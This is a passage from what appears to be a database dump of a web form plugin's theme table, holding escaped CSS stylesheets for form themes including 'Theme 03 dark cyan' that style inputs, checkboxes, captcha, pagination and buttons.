2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #640B0B;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #942323;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #9A0B0B  0%, #7B2828 39%, #752D2D 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #9A0B0B ), color-stop(39%, #7B2828 ), color-stop(100%, #752D2D )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #9A0B0B 0%, #7B2828 39%, #752D2D 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/02/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}',0),(11,'Theme 03 dark cyan','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EEEF;\r\nborder: 1px solid #0B7A97;\r\nmargin-bottom: 10px;\r\ncolor: #0B7A97;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	border-radius: 0px;\r\n	border: 1px solid #39680B;\r\n	background: #C9FD9C;\r\n	height: 13px;\r\n	width: 13px;\r\n}\r\n.ui-slider-horizontal .ui-slider-handle {\r\n	top: -5px !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:active {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:focus {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\nui-state-hover {\r\n	background: #0C6177 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #2796B3 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	border: 0px solid #ccc;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/03/03/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 32px;\r\n	height: 25px;\r\n	background: url([SITE_ROOT]/images/03/upload.png);\r\n	display: inline-block;\r\n}\r\ndiv.wdform-page-button {\r\n	color: #414141;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 36px;\r\n	line-height: 36px;\r\n	background-color: #ACABAB;\r\npadding: 2px 15px;\r\nvertical-align: middle;\r\nborder: none;\r\nfont-size: 15px;\r\n}\r\n\r\n.button-submit {\r\nbackground: #0B7A97;\r\ncursor: pointer;\r\nfont-size: 17px;\r\nmin-width: 80px;\r\nmin-height: 34px;\r\ncolor: #fff;\r\nborder: 2px solid #18627C;\r\nmargin: 5px;\r\nbox-shadow: 0px 0px 1px 1px #56B4D5;\r\nfont-family: Segoe UI;\r\n}\r\n.button-reset {\r\n	background: #D8D6D7;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 2px solid #fff;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px 1px #969495;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_page {\r\n	background: #F0EEEF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 30px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: url([SITE_ROOT]/images/03/03/bg.png);\r\n	text-align: left;\r\n	padding: 10px 20px 10px 50px;\r\n	border-radius: 0px;\r\n	-moz-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	-webkit-box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	box-shadow: 7px -9px 20px -5px rgba(0, 0, 0, 0.23), -7px 9px 20px -5px rgba(0, 0, 0, 0.23);\r\n	width: 466px;\r\n	text-align: right;\r\n	color: #fff;\r\nfont-size:18px;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\nmargin: 16px 15px;\r\ntext-align: left;\r\ncolor: #555;\r\nfont-size:18px;\r\n}\r\n.wdform_section {\r\n	display: inline-block;\r\n	padding: 0px 15px;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	padding: 2px;\r\n	height: 26px;\r\n	overflow: hidden;\r\n	border: 0px solid #ccc;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 25px;\r\n	border: 0px solid #ccc;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border-color: #FFB471;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n}\r\n.wdform-calendar-button:focus {\r\n outline:none; \r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \"\";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n	background-color: #DFDFDF;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #fff;\r\n	background-color: #0C6177;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	background-color: #2796B3;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 33px;\r\n	text-align: center;\r\n	font-size: 21px;\r\n	padding: 5px 20px 0px 20px;\r\n	margin-bottom: -13px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 20px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #752D2D ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #0E6378 ), color-stop(39%, #2C7487 ), color-stop(100%, #2D7587 )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #0E6378 0%, #2C7487 39%, #2D7587 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #DFDFDF;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px -34px 3px 9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 12px;\r\nline-height:18px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_percentage_arrow {\r\n	display: inline-block;\r\n	width: 34px;\r\n	height: 18px;\r\n	background: url([SITE_ROOT]/images/03/03/percentage_arrow.png);\r\n	position: relative;\r\n	left: -1px;\r\ntop:0px;\r\n	z-index: 0;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: 